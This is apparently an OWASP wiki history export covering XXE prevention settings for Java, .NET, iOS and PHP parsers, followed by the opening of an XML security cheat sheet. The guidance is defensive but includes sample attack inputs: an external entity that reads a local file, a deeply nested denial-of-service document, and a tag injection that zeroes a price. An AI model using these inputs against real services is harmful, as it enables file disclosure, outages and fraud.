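The two properties above can be combined into a small factory method. The following Java sketch is illustrative: the class and method names are hypothetical, and it uses the &amp;lt;code&amp;gt;XMLInputFactory&amp;lt;/code&amp;gt; constants instead of the literal property names.&lt;br /&gt;

```java
import javax.xml.stream.XMLInputFactory;

public class HardenedStaxFactory {
    // Returns an XMLInputFactory with DTD support and external entities switched off.
    static XMLInputFactory create() {
        XMLInputFactory xif = XMLInputFactory.newInstance();
        // Disables DTDs entirely for readers created by this factory.
        xif.setProperty(XMLInputFactory.SUPPORT_DTD, Boolean.FALSE);
        // Same property as "javax.xml.stream.isSupportingExternalEntities".
        xif.setProperty(XMLInputFactory.IS_SUPPORTING_EXTERNAL_ENTITIES, Boolean.FALSE);
        return xif;
    }
}
```

Creating every reader through one such method keeps the hardening in a single place instead of repeating the property calls wherever XML is read.&lt;br /&gt;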
&lt;br /&gt;
===TransformerFactory===&lt;br /&gt;
To protect a Java TransformerFactory from XXE, do this:&lt;br /&gt;
* TransformerFactory tf = TransformerFactory.newInstance();&lt;br /&gt;
* tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, &amp;quot;&amp;quot;);&lt;br /&gt;
* tf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, &amp;quot;&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
===Validator===&lt;br /&gt;
To protect a Java Validator from XXE, do this:&lt;br /&gt;
* SchemaFactory factory = SchemaFactory.newInstance(&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;);&lt;br /&gt;
* Schema schema = factory.newSchema();&lt;br /&gt;
* Validator validator = schema.newValidator();&lt;br /&gt;
* validator.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, &amp;quot;&amp;quot;);&lt;br /&gt;
* validator.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, &amp;quot;&amp;quot;);&lt;br /&gt;
&lt;br /&gt;
===SchemaFactory===&lt;br /&gt;
To protect a SchemaFactory from XXE, do this:&lt;br /&gt;
* SchemaFactory factory = SchemaFactory.newInstance(&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;);&lt;br /&gt;
* factory.setProperty(XMLConstants.ACCESS_EXTERNAL_DTD, &amp;quot;&amp;quot;);&lt;br /&gt;
* factory.setProperty(XMLConstants.ACCESS_EXTERNAL_SCHEMA, &amp;quot;&amp;quot;);&lt;br /&gt;
* Schema schema = factory.newSchema(Source);&lt;br /&gt;
&lt;br /&gt;
===SAXTransformerFactory===&lt;br /&gt;
To protect a Java SAXTransformerFactory from XXE, do this:&lt;br /&gt;
* SAXTransformerFactory sf = SAXTransformerFactory.newInstance();		&lt;br /&gt;
* sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, &amp;quot;&amp;quot;);&lt;br /&gt;
* sf.setAttribute(XMLConstants.ACCESS_EXTERNAL_STYLESHEET, &amp;quot;&amp;quot;);&lt;br /&gt;
* sf.newXMLFilter(Source);&lt;br /&gt;
&lt;br /&gt;
===XMLReader===&lt;br /&gt;
To protect a Java XMLReader from XXE, do this:&lt;br /&gt;
* XMLReader spf = XMLReaderFactory.createXMLReader();&lt;br /&gt;
* spf.setFeature(&amp;quot;http://xml.org/sax/features/external-general-entities&amp;quot;, false);&lt;br /&gt;
* spf.setFeature(&amp;quot;http://xml.org/sax/features/external-parameter-entities&amp;quot;, false);&lt;br /&gt;
* spf.setFeature(&amp;quot;http://apache.org/xml/features/nonvalidating/load-external-dtd&amp;quot;, false);&lt;br /&gt;
&lt;br /&gt;
===saxReader===&lt;br /&gt;
To protect a Java saxReader from XXE, do this:&lt;br /&gt;
* saxReader.setFeature(&amp;quot;http://apache.org/xml/features/disallow-doctype-decl&amp;quot;, true);&lt;br /&gt;
* saxReader.setFeature(&amp;quot;http://xml.org/sax/features/external-general-entities&amp;quot;, false);&lt;br /&gt;
* saxReader.setFeature(&amp;quot;http://xml.org/sax/features/external-parameter-entities&amp;quot;, false);&lt;br /&gt;
Note: Based on testing, omitting any one of these settings can leave the parser vulnerable to XXE attacks.&lt;br /&gt;
===Unmarshaller===&lt;br /&gt;
Since an Unmarshaller parses XML and does not support any flags for disabling XXE, it’s imperative to parse the untrusted XML through a configurable secure parser first, generate a Source object as a result, and pass the source object to the Unmarshaller. For example:&lt;br /&gt;
* SAXParserFactory spf = SAXParserFactory.newInstance();&lt;br /&gt;
* spf.setFeature(&amp;quot;http://xml.org/sax/features/external-general-entities&amp;quot;, false);&lt;br /&gt;
* spf.setFeature(&amp;quot;http://xml.org/sax/features/external-parameter-entities&amp;quot;, false);&lt;br /&gt;
* spf.setFeature(&amp;quot;http://apache.org/xml/features/nonvalidating/load-external-dtd&amp;quot;, false);&lt;br /&gt;
&lt;br /&gt;
* Source xmlSource = new SAXSource(spf.newSAXParser().getXMLReader(), new InputSource(new StringReader(xml)));&lt;br /&gt;
* JAXBContext jc = JAXBContext.newInstance(Object.class);&lt;br /&gt;
* Unmarshaller um = jc.createUnmarshaller();&lt;br /&gt;
* um.unmarshal(xmlSource);&lt;br /&gt;
&lt;br /&gt;
===XPathExpression===&lt;br /&gt;
An XPathExpression is similar to an Unmarshaller where it can’t be configured securely by itself, so the untrusted data must be parsed through another securable XML parser first. For example:&lt;br /&gt;
* DocumentBuilderFactory df = DocumentBuilderFactory.newInstance();&lt;br /&gt;
* df.setAttribute(XMLConstants.ACCESS_EXTERNAL_DTD, &amp;quot;&amp;quot;);&lt;br /&gt;
* df.setAttribute(XMLConstants.ACCESS_EXTERNAL_SCHEMA, &amp;quot;&amp;quot;);&lt;br /&gt;
* DocumentBuilder builder = df.newDocumentBuilder();&lt;br /&gt;
* xPathExpression.evaluate(builder.parse(new ByteArrayInputStream(xml.getBytes())));&lt;br /&gt;
&lt;br /&gt;
===java.beans.XMLDecoder===&lt;br /&gt;
&lt;br /&gt;
The [https://docs.oracle.com/javase/8/docs/api/java/beans/XMLDecoder.html#readObject-- readObject()] method in this class is fundamentally unsafe. Not only is the XML it parses subject to XXE, but the method can be used to construct any Java object, and [http://stackoverflow.com/questions/14307442/is-it-safe-to-use-xmldecoder-to-read-document-files execute arbitrary code as described here]. And there is no way to make use of this class safe except to trust or properly validate the input being passed into it. As such, we'd strongly recommend completely avoiding the use of this class and replacing it with a safe or properly configured XML parser as described elsewhere in this cheat sheet.&lt;br /&gt;
&lt;br /&gt;
===Other XML Parsers===&lt;br /&gt;
There are many 3rd party libraries that parse XML either directly or through their use of other libraries. Please test and verify their XML parser is secure against XXE by default. If the parser is not secure by default, look for flags supported by the parser to disable all possible external resource inclusions like the examples given above. If there’s no control exposed to the outside, make sure the untrusted content is passed through a secure parser first and then passed to insecure 3rd party parser similar to how the Unmarshaller is secured.&lt;br /&gt;
&lt;br /&gt;
==== Spring Framework MVC/OXM XXE Vulnerabilities ====&lt;br /&gt;
&lt;br /&gt;
For example, some XXE vulnerabilities were found in [http://pivotal.io/security/cve-2013-4152 Spring OXM] and [http://pivotal.io/security/cve-2013-7315 Spring MVC]. The following versions of the Spring Framework are vulnerable to XXE:&lt;br /&gt;
&lt;br /&gt;
* 3.0.0 to 3.2.3 (Spring OXM &amp;amp; Spring MVC)&lt;br /&gt;
* 4.0.0.M1 (Spring OXM)&lt;br /&gt;
* 4.0.0.M1-4.0.0.M2 (Spring MVC)&lt;br /&gt;
&lt;br /&gt;
There were other issues as well that were fixed later, so to fully address these issues, Spring recommends you upgrade to Spring Framework 3.2.8+ or 4.0.2+.&lt;br /&gt;
&lt;br /&gt;
For Spring OXM, this is referring to the use of org.springframework.oxm.jaxb.Jaxb2Marshaller. Note that the CVE for Spring OXM specifically indicates that 2 XML parsing situations are up to the developer to get right, and 2 are the responsibility of Spring and were fixed to address this CVE. Here's what they say:&lt;br /&gt;
&lt;br /&gt;
 '''Two situations developers must handle:'''&lt;br /&gt;
 For a DOMSource, the XML has already been parsed by user code and that code is responsible for protecting against XXE.&lt;br /&gt;
 For a StAXSource, the XMLStreamReader has already been created by user code and that code is responsible for protecting against XXE.&lt;br /&gt;
&lt;br /&gt;
 '''The issue Spring fixed:'''&lt;br /&gt;
 &lt;br /&gt;
 For SAXSource and StreamSource instances, Spring processed external entities by default thereby creating this vulnerability.&lt;br /&gt;
 Here's an example of using a StreamSource that was vulnerable, but is now safe, if you are using a fixed version of Spring OXM or Spring MVC:&lt;br /&gt;
 &lt;br /&gt;
  org.springframework.oxm.jaxb.Jaxb2Marshaller marshaller = new org.springframework.oxm.jaxb.Jaxb2Marshaller();&lt;br /&gt;
  marshaller.unmarshal(new StreamSource(new StringReader(some_string_containing_XML))); // Must cast return Object to whatever type you are unmarshalling&lt;br /&gt;
&lt;br /&gt;
So, per the [http://pivotal.io/security/cve-2013-4152 Spring OXM CVE writeup], the above is now safe. But if you were to use a DOMSource or StAXSource instead, it would be up to you to configure those sources to be safe from XXE.&lt;br /&gt;
&lt;br /&gt;
==.NET==&lt;br /&gt;
&lt;br /&gt;
The following information for XXE in .NET is directly from James Jardine's excellent .NET XXE article:  https://www.jardinesoftware.net/2016/05/26/xxe-and-net/.&lt;br /&gt;
This newer article provides more recent and more detailed information than the older article from Microsoft on how to prevent XXE and XML Denial of Service in .NET: http://msdn.microsoft.com/en-us/magazine/ee335713.aspx.&lt;br /&gt;
&lt;br /&gt;
{| style=&amp;quot;width: 20%; align:center; text-align:left; border: 2px solid #4d953d; background-color:#F2F2F2; padding=2;&amp;quot; &lt;br /&gt;
|- style=&amp;quot;background-color: #4d953d; color: #FFFFFF;&amp;quot;&lt;br /&gt;
! XML Object !! Safe by Default?&lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| '''XmlReader'''&lt;br /&gt;
| &lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| Prior to 4.0&lt;br /&gt;
| Yes&lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| 4.0 +&lt;br /&gt;
| Yes&lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| '''XmlTextReader'''&lt;br /&gt;
| &lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| Prior to 4.0&lt;br /&gt;
| No&lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| 4.0 +&lt;br /&gt;
| No&lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| '''XmlDocument'''&lt;br /&gt;
| &lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| Prior to 4.6&lt;br /&gt;
| No&lt;br /&gt;
|- style=&amp;quot;background-color: #FFFFFF;&amp;quot; &lt;br /&gt;
| 4.6 +&lt;br /&gt;
| Yes&lt;br /&gt;
|}&lt;br /&gt;
&lt;br /&gt;
=== Prior to .NET 4.0 ===&lt;br /&gt;
&lt;br /&gt;
In .NET Framework versions prior to 4.0, DTD parsing behavior for XmlReader and XmlTextReader is controlled by the Boolean ProhibitDtd property found in the System.Xml.XmlReaderSettings and System.Xml.XmlTextReader classes. Set these values to true to disable inline DTDs completely:&lt;br /&gt;
&lt;br /&gt;
XmlReader:&lt;br /&gt;
&lt;br /&gt;
 XmlReaderSettings settings = new XmlReaderSettings(); &lt;br /&gt;
 settings.ProhibitDtd = true; // Not explicitly needed because the default is 'true'&lt;br /&gt;
 XmlReader reader = XmlReader.Create(stream, settings);&lt;br /&gt;
&lt;br /&gt;
XmlTextReader:&lt;br /&gt;
&lt;br /&gt;
 XmlTextReader reader = new XmlTextReader(stream);&lt;br /&gt;
 reader.ProhibitDtd = true;  // NEEDED because the default is FALSE!!&lt;br /&gt;
&lt;br /&gt;
XmlDocument:&lt;br /&gt;
&lt;br /&gt;
XmlDocument doesn't use a ProhibitDtd property. Instead you have to set its XmlResolver to null.&lt;br /&gt;
 &lt;br /&gt;
 static void LoadXML()&lt;br /&gt;
 {&lt;br /&gt;
   string xml = &amp;quot;&amp;lt;?xml version=\&amp;quot;1.0\&amp;quot; ?&amp;gt;&amp;lt;!DOCTYPE doc &amp;quot; +&lt;br /&gt;
 	&amp;quot;[&amp;lt;!ENTITY win SYSTEM \&amp;quot;file:///C:/Users/user/Documents/testdata2.txt\&amp;quot;&amp;gt;]&amp;quot; +&lt;br /&gt;
 	&amp;quot;&amp;gt;&amp;lt;doc&amp;gt;&amp;amp;win;&amp;lt;/doc&amp;gt;&amp;quot;;&lt;br /&gt;
 &lt;br /&gt;
   XmlDocument xmlDoc = new XmlDocument();&lt;br /&gt;
   xmlDoc.XmlResolver = null;   // Setting this to null disables resolution of external entities and DTDs - it's NOT null by default.&lt;br /&gt;
   xmlDoc.LoadXml(xml);&lt;br /&gt;
   Console.WriteLine(xmlDoc.InnerText);&lt;br /&gt;
   Console.ReadLine();&lt;br /&gt;
 }&lt;br /&gt;
&lt;br /&gt;
=== .NET 4.0 and later ===&lt;br /&gt;
&lt;br /&gt;
In .NET Framework version 4.0, DTD parsing behavior changed: the ProhibitDtd property was deprecated in favor of the new DtdProcessing property. However, the default settings were not changed, so XmlTextReader is still vulnerable to XXE by default.&lt;br /&gt;
&lt;br /&gt;
Setting DtdProcessing to Prohibit causes the runtime to throw an exception if a &amp;lt;!DOCTYPE&amp;gt; element is present in the XML. To set this value yourself, it looks like this:&lt;br /&gt;
&lt;br /&gt;
 XmlReaderSettings settings = new XmlReaderSettings();&lt;br /&gt;
 settings.DtdProcessing = DtdProcessing.Prohibit;&lt;br /&gt;
 XmlReader reader = XmlReader.Create(stream, settings);&lt;br /&gt;
&lt;br /&gt;
Alternatively, you can set the DtdProcessing property to Ignore, which does not throw an exception on encountering a &amp;lt;!DOCTYPE&amp;gt; declaration but simply skips over it without processing it. Finally, you can set DtdProcessing to Parse if you do want to allow and process inline DTDs.&lt;br /&gt;
&lt;br /&gt;
=== .NET 4.6 and later ===&lt;br /&gt;
&lt;br /&gt;
Starting with .NET 4.6, Microsoft finally changed the default behavior of XmlDocument to be safe from XXE by default, by setting the XmlResolver to null.&lt;br /&gt;
&lt;br /&gt;
For more details on all of this, please read [https://www.jardinesoftware.net/2016/05/26/xxe-and-net/ James Jardine's article].&lt;br /&gt;
&lt;br /&gt;
If you need to enable DTD processing, instructions on how to do so safely are described in detail in the [http://msdn.microsoft.com/en-us/magazine/ee335713.aspx referenced MSDN article].&lt;br /&gt;
&lt;br /&gt;
==iOS==&lt;br /&gt;
&lt;br /&gt;
===libxml2===&lt;br /&gt;
&lt;br /&gt;
iOS includes the C/C++ libxml2 library described above, so that guidance applies if you are using libxml2 directly. However, the version of libxml2 provided up through iOS6 is prior to version 2.9 of libxml2 (which protects against XXE by default).&lt;br /&gt;
&lt;br /&gt;
===NSXMLDocument===&lt;br /&gt;
&lt;br /&gt;
iOS also provides an NSXMLDocument type, which is built on top of libxml2. However, NSXMLDocument provides some additional protections against XXE that aren't available in libxml2 directly. Per the 'NSXMLDocument External Entity Restriction API' section of: http://developer.apple.com/library/ios/#releasenotes/Foundation/RN-Foundation-iOS/Foundation_iOS5.html:&lt;br /&gt;
&lt;br /&gt;
* iOS4 and earlier: All external entities are loaded by default.&lt;br /&gt;
&lt;br /&gt;
* iOS5 and later: Only entities that don't require network access are loaded, which is safer.&lt;br /&gt;
&lt;br /&gt;
However, to completely disable XXE in an NSXMLDocument in any version of iOS, specify NSXMLNodeLoadExternalEntitiesNever when creating the NSXMLDocument.&lt;br /&gt;
&lt;br /&gt;
==PHP==&lt;br /&gt;
&lt;br /&gt;
Per [http://php.net/manual/en/function.libxml-disable-entity-loader.php the PHP documentation], the following should be set when using the default PHP XML parser in order to prevent XXE:&lt;br /&gt;
&lt;br /&gt;
 libxml_disable_entity_loader(true);&lt;br /&gt;
&lt;br /&gt;
A description of how to abuse this in PHP is presented in a good [https://www.sensepost.com/blog/2014/revisting-xxe-and-abusing-protocols/ SensePost article] describing a PHP-based XXE vulnerability that was fixed in Facebook.&lt;br /&gt;
&lt;br /&gt;
==Reference==&lt;br /&gt;
* FindBugs [https://find-sec-bugs.github.io/bugs.htm#XXE_SAXPARSER]&lt;br /&gt;
* XXEbugFind Tool [https://github.com/ssexxe/XXEBugFind]&lt;br /&gt;
&lt;br /&gt;
== Authors and Primary Editors  ==&lt;br /&gt;
&lt;br /&gt;
[[User:wichers|Dave Wichers]] - dave.wichers[at]owasp.org&amp;lt;br/&amp;gt;&lt;br /&gt;
[[User:Xiaoran_Wang|Xiaoran Wang]] - xiaoran[at]attacker-domain.com&amp;lt;br/&amp;gt;&lt;br /&gt;
James Jardine - james[at]jardinesoftware.com&lt;br /&gt;
&lt;br /&gt;
== Other Cheatsheets ==&lt;br /&gt;
&lt;br /&gt;
{{Cheatsheet_Navigation_Body}}&lt;br /&gt;
[[Category:Cheatsheets]]&lt;/div&gt;</summary>
		<author><name>Fernando.arnaboldi</name></author>	</entry>

	<entry>
		<id>https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224447</id>
		<title>XML Security Cheat Sheet</title>
		<link rel="alternate" type="text/html" href="https://wiki.owasp.org/index.php?title=XML_Security_Cheat_Sheet&amp;diff=224447"/>
				<updated>2016-12-21T21:27:26Z</updated>
		
		<summary type="html">&lt;p&gt;Fernando.arnaboldi: &lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Introduction ==&lt;br /&gt;
&lt;br /&gt;
Specifications for XML and XML schemas include multiple security flaws. At the same time, these specifications provide the tools required to protect XML applications. Even though we use XML schemas to define the security of XML documents, they can be used to perform a variety of attacks: file retrieval, server side request forgery, port scanning, or brute forcing. This cheat sheet shows how these possibilities can be exploited in libraries and software, and is divided into two sections:&lt;br /&gt;
* '''Malformed XML Documents''': vulnerabilities using documents that are not well formed.&lt;br /&gt;
* '''Invalid XML Documents''': vulnerabilities using documents that do not have the expected structure.&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
=  Malformed XML Documents =&lt;br /&gt;
The W3C XML specification defines a set of principles that XML documents must follow to be considered well formed. When a document violates any of these principles, it must be considered a fatal error and the data it contains is considered malformed. Multiple tactics will cause a malformed document: removing an ending tag, rearranging the order of elements into a nonsensical structure, introducing forbidden characters, and so on. The XML parser should stop execution as soon as it detects a fatal error. The document should not undergo any additional processing, and the application should display an error message.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is to use an XML processor that follows W3C specifications and does not take significant additional time to process malformed documents. In addition, use only well-formed documents and validate the contents of each element and attribute to process only valid values within predefined boundaries.&lt;br /&gt;
&lt;br /&gt;
== More Time Required ==&lt;br /&gt;
A malformed document may affect the consumption of Central Processing Unit (CPU) resources. In certain scenarios, the amount of time required to process malformed documents may be greater than that required for well-formed documents. When this happens, an attacker may exploit an asymmetric resource consumption attack to take advantage of the greater processing time to cause a Denial of Service (DoS). &lt;br /&gt;
&lt;br /&gt;
To assess the likelihood of this attack, compare the time taken to parse a regular XML document with the time taken to parse a malformed version of that same document. Then, consider how an attacker could use this vulnerability in conjunction with an XML flood attack using multiple documents to amplify the effect.&lt;br /&gt;
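&lt;br /&gt;
The timing comparison could be sketched as follows in Python. This is a minimal sketch, not a benchmark: the function name &amp;lt;tt&amp;gt;parse_seconds&amp;lt;/tt&amp;gt; and the default of 100 repetitions are assumptions made for illustration, and the standard library parser only stands in for whichever parser the application actually uses.&lt;br /&gt;

```python
import time
import xml.etree.ElementTree as ET


def parse_seconds(xml_bytes, repeats=100):
    """Return the total time in seconds spent parsing xml_bytes repeats times."""
    start = time.perf_counter()
    for _ in range(repeats):
        try:
            ET.fromstring(xml_bytes)
        except ET.ParseError:
            # A malformed document is expected to fail; only the time matters.
            pass
    return time.perf_counter() - start
```

Calling the function once with the regular document and once with its malformed version gives two timings; a malformed timing that is much larger than the regular one suggests that malformed input is more expensive to process.&lt;br /&gt;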
&lt;br /&gt;
== Applications Processing Malformed Data ==&lt;br /&gt;
Certain XML parsers have the ability to recover malformed documents. They can be instructed to try their best to return a valid tree with all the content that they can manage to parse, regardless of the document’s noncompliance with the specifications. Since there are no predefined rules for the recovery process, the approach and results may not always be the same. Using malformed documents might lead to unexpected issues related to data integrity.&lt;br /&gt;
&lt;br /&gt;
The following two scenarios illustrate attack vectors a parser will analyze in recovery mode:&lt;br /&gt;
&lt;br /&gt;
=== Malformed Document to Malformed Document ===&lt;br /&gt;
According to the XML specification, the string &amp;lt;tt&amp;gt;--&amp;lt;/tt&amp;gt; (double-hyphen) must not occur within comments. Using the recovery mode of lxml and PHP, the following document will remain the same after being recovered:&lt;br /&gt;
 &amp;lt;pre&amp;gt;&amp;lt;element&amp;gt;&lt;br /&gt;
 &amp;lt;!-- one&lt;br /&gt;
  &amp;lt;!-- another comment&lt;br /&gt;
 comment --&amp;gt;&lt;br /&gt;
&amp;lt;/element&amp;gt;&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
=== Well-Formed Document to Well-Formed Document Normalized ===&lt;br /&gt;
Certain parsers may consider normalizing the contents of your &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; sections. This means that they will update the special characters contained in the &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section to contain the safe versions of these characters even though it is not required:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  &amp;lt;![CDATA[&amp;lt;script&amp;gt;a=1;&amp;lt;/script&amp;gt;]]&amp;gt;&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Normalization of a &amp;lt;tt&amp;gt;CDATA&amp;lt;/tt&amp;gt; section is not a common rule among parsers. Libxml could transform this document to its canonical version, but although well formed, its contents may be considered malformed depending on the situation:&lt;br /&gt;
 &amp;lt;element&amp;gt;&lt;br /&gt;
  '''&amp;amp;amp;lt;script&amp;amp;amp;gt;a=1;&amp;amp;amp;lt;/script&amp;amp;amp;gt;'''&lt;br /&gt;
 &amp;lt;/element&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Coercive Parsing ==&lt;br /&gt;
A coercive attack in XML involves parsing deeply nested XML documents without their corresponding ending tags. The idea is to make the victim use up, and eventually deplete, the machine’s resources and cause a denial of service on the target.&lt;br /&gt;
Reports of a DoS attack in Firefox 3.67 included the use of 30,000 open XML elements without their corresponding ending tags. Removing the closing tags simplified the attack since it requires only half of the size of a well-formed document to accomplish the same results. The number of tags being processed eventually caused a stack overflow. A simplified version of such a document would look like this: &lt;br /&gt;
 &amp;lt;A1&amp;gt;&lt;br /&gt;
  &amp;lt;A2&amp;gt; &lt;br /&gt;
   &amp;lt;A3&amp;gt;&lt;br /&gt;
    ...&lt;br /&gt;
     &amp;lt;A30000&amp;gt;&lt;br /&gt;
&lt;br /&gt;
== Violation of XML Specification Rules ==&lt;br /&gt;
Unexpected consequences may result from manipulating documents using parsers that do not follow W3C specifications. It may be possible to achieve crashes and/or code execution when the software does not properly verify how to handle incorrect XML structures. Feeding the software with fuzzed XML documents may expose this behavior. &lt;br /&gt;
&lt;br /&gt;
= Invalid XML Documents =&lt;br /&gt;
Attackers may introduce unexpected values in documents to take advantage of an application that does not verify whether the document contains a valid set of values. Schemas specify restrictions that help identify whether documents are valid. A valid document is well formed and complies with the restrictions of a schema, and more than one schema can be used to validate a document. These restrictions may appear in multiple files, either using a single schema language or relying on the strengths of the different schema languages.&lt;br /&gt;
&lt;br /&gt;
The recommendation to avoid these vulnerabilities is that each XML document must have a precisely defined XML Schema (not DTD) with every piece of information properly restricted to avoid problems of improper data validation. Use a local copy or a known good repository instead of the schema reference supplied in the XML document. Also, perform an integrity check of the XML schema file being referenced, bearing in mind the possibility that the repository could be compromised. In cases where the XML documents are using remote schemas, configure servers to use only secure, encrypted communications to prevent attackers from eavesdropping on network traffic.&lt;br /&gt;
&lt;br /&gt;
== Document without Schema ==&lt;br /&gt;
Consider a bookseller that uses a web service through a web interface to make transactions. The XML document for transactions is composed of two elements: an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value related to an item and a certain &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt;. The user may only introduce a certain &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; value using the web interface:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
If there is no control on the document’s structure, the application could also process different well-formed messages with unintended consequences. The previous document could have contained additional tags to affect the behavior of the underlying application processing its contents:&lt;br /&gt;
 &amp;lt;buy&amp;gt;&lt;br /&gt;
  &amp;lt;id&amp;gt;'''123&amp;lt;/id&amp;gt;&amp;lt;price&amp;gt;0&amp;lt;/price&amp;gt;&amp;lt;id&amp;gt;'''&amp;lt;/id&amp;gt;&lt;br /&gt;
  &amp;lt;price&amp;gt;10&amp;lt;/price&amp;gt;&lt;br /&gt;
 &amp;lt;/buy&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Notice again how the value 123 is supplied as an &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt;, but now the document includes additional opening and closing tags. The attacker closes the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element and sets a bogus &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; element to the value 0. The final step to keep the structure well-formed is to add one empty &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; element. After this, the application adds the closing tag for &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and sets the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; to 10. If the application processes only the first values provided for the &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; and the &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; without performing any type of control on the structure, it could benefit the attacker by providing the ability to buy a book without actually paying for it.&lt;br /&gt;
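&lt;br /&gt;
Without a schema, the application itself has to control the structure. The following Python sketch shows one way such a check might look. The function name &amp;lt;tt&amp;gt;parse_buy&amp;lt;/tt&amp;gt; and the rule that the only acceptable children are exactly one &amp;lt;tt&amp;gt;id&amp;lt;/tt&amp;gt; followed by one &amp;lt;tt&amp;gt;price&amp;lt;/tt&amp;gt; are assumptions made for illustration, not part of the service described here.&lt;br /&gt;

```python
import xml.etree.ElementTree as ET

# Assumed structure: exactly one id followed by exactly one price.
EXPECTED_CHILDREN = ["id", "price"]


def parse_buy(xml_bytes):
    """Return (id, price) as text, or raise ValueError on an unexpected structure."""
    root = ET.fromstring(xml_bytes)
    if root.tag != "buy":
        raise ValueError("unexpected root element: %r" % root.tag)
    tags = [child.tag for child in root]
    if tags != EXPECTED_CHILDREN:
        # Duplicated, missing, reordered, or extra elements are all rejected.
        raise ValueError("unexpected child elements: %r" % tags)
    return root.findtext("id"), root.findtext("price")
```

With this check in place, the injected document is rejected because it contains four child elements instead of the expected two.&lt;br /&gt;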
&lt;br /&gt;
== Unrestrictive Schema ==&lt;br /&gt;
Certain schemas do not offer enough restrictions for the type of data that each element can receive. This is what normally happens when using DTD; it has a very limited set of possibilities compared to the type of restrictions that can be applied in XML documents. This could expose the application to undesired values within elements or attributes that would be easy to constrain when using other schema languages. In the following example, a person’s &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; is validated against an inline DTD schema:&lt;br /&gt;
 &amp;lt;!DOCTYPE person [&lt;br /&gt;
  &amp;lt;!ELEMENT person (name, age)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT name (#PCDATA)&amp;gt;&lt;br /&gt;
  &amp;lt;!ELEMENT age (#PCDATA)&amp;gt;&lt;br /&gt;
 ]&amp;gt;&lt;br /&gt;
 &amp;lt;person&amp;gt;&lt;br /&gt;
  &amp;lt;name&amp;gt;John Doe&amp;lt;/name&amp;gt;&lt;br /&gt;
  &amp;lt;age&amp;gt;'''11111..(1.000.000digits)..11111'''&amp;lt;/age&amp;gt;&lt;br /&gt;
 &amp;lt;/person&amp;gt;&lt;br /&gt;
&lt;br /&gt;
The previous document contains an inline DTD with a root element named &amp;lt;tt&amp;gt;person&amp;lt;/tt&amp;gt;. This element contains two elements in a specific order: &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and then &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;. The elements &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; and &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; are both defined to contain &amp;lt;tt&amp;gt;PCDATA&amp;lt;/tt&amp;gt;. The well-formed and valid XML document begins after this definition. The element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; contains an irrelevant value, but the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element contains one million digits. Since there are no restrictions on the maximum size for the &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt; element, this one-million-digit string could be sent to the server for this element. Typically this type of element should be restricted to contain no more than a certain number of characters and constrained to a certain set of characters (for example, digits from 0 to 9, the + sign and the - sign).&lt;br /&gt;
If not properly restricted, applications may handle potentially invalid values contained in documents. Since it is not possible to indicate specific restrictions (a maximum length for the element &amp;lt;tt&amp;gt;name&amp;lt;/tt&amp;gt; or a valid range for the element &amp;lt;tt&amp;gt;age&amp;lt;/tt&amp;gt;), this type of schema increases the risk of affecting the integrity and availability of resources.&lt;br /&gt;
&lt;br /&gt;
== Improper Data Validation == &lt;br /&gt;
